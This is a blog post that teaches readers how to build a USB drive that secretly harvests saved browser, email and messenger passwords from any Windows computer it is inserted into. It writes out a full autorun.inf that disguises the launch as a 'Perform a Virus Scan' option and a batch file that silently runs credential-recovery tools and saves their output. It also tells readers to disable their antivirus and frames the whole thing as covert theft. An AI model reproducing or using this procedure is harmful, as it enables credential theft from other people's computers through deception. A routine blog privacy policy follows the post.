Thursday, 17 March 2011

HOW TO SNIFF PASSWORDS FROM COMPUTERS USING USB FLASH DRIVE



Most of the passwords which are used on a daily basis are stored by Microsoft Windows, including instant messenger passwords such as MSN, AOL, Windows messenger, Yahoo etc. Moreso, windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these stored passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. You will need the following tools
to create our rootkit.
 Protected Storage PassView: This tool recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Wi1.ndows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Moreso, Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Here is a step by step procedure to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools by clicking on it. Then, extract them and copy only the executables(.exe files) into your USB
    Pendrive.
    i.e: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it;
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
 2. In the pop-up window, select the first option (Perform a Virus Scan).
 3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
 4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

NOTES: This hack works on Windows 2000, XP, Vista and 7. This procedure will only recover the stored passwords (if any) on the computer. Also, if they catch you, I no dey ooooo. You are on your own! Courtesy of: Napster
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Privacy Policy

Privacy Policy - aboutinfotech.blogspot.com

Privacy Policy for aboutinfotech.blogspot.com

If you require any more information or have any questions about our privacy policy, please feel free to contact us by email at napster306@gmail.com.

At aboutinfotech.blogspot.com, the privacy of our visitors is of extreme importance to us. This privacy policy document outlines the types of personal information is received and collected by aboutinfotech.blogspot.com and how it is used.

Log Files
Like many other Web sites, aboutinfotech.blogspot.com makes use of log files. The information inside the log files includes internet protocol ( IP ) addresses, type of browser, Internet Service Provider ( ISP ), date/time stamp, referring/exit pages, and number of clicks to analyze trends, administer the site, track users movement around the site, and gather demographic information. IP addresses, and other such information are not linked to any information that is personally identifiable.

Cookies and Web Beacons
aboutinfotech.blogspot.com does use cookies to store information about visitors preferences, record user-specific information on which pages the user access or visit, customize Web page content based on visitors browser type or other information that the visitor sends via their browser.

DoubleClick DART Cookie

.:: Google, as a third party vendor, uses cookies to serve ads on aboutinfotech.blogspot.com.
.:: Google's use of the DART cookie enables it to serve ads to your users based on their visit to aboutinfotech.blogspot.com and other sites on the Internet.
.:: Users may opt out of the use of the DART cookie by visiting the Google ad and content network privacy policy at the following URL - http://www.google.com/privacy_ads.html

Some of our advertising partners may use cookies and web beacons on our site. Our advertising partners include .......
Google Adsense









These third-party ad servers or ad networks use technology to the advertisements and links that appear on aboutinfotech.blogspot.com send directly to your browsers. They automatically receive your IP address when this occurs. Other technologies ( such as cookies, JavaScript, or Web Beacons ) may also be used by the third-party ad networks to measure the effectiveness of their advertisements and / or to personalize the advertising content that you see.

aboutinfotech.blogspot.com has no access to or control over these cookies that are used by third-party advertisers.

You should consult the respective privacy policies of these third-party ad servers for more detailed information on their practices as well as for instructions about how to opt-out of certain practices. aboutinfotech.blogspot.com's privacy policy does not apply to, and we cannot control the activities of, such other advertisers or web sites.

If you wish to disable cookies, you may do so through your individual browser options. More detailed information about cookie management with specific web browsers can be found at the browsers' respective websites.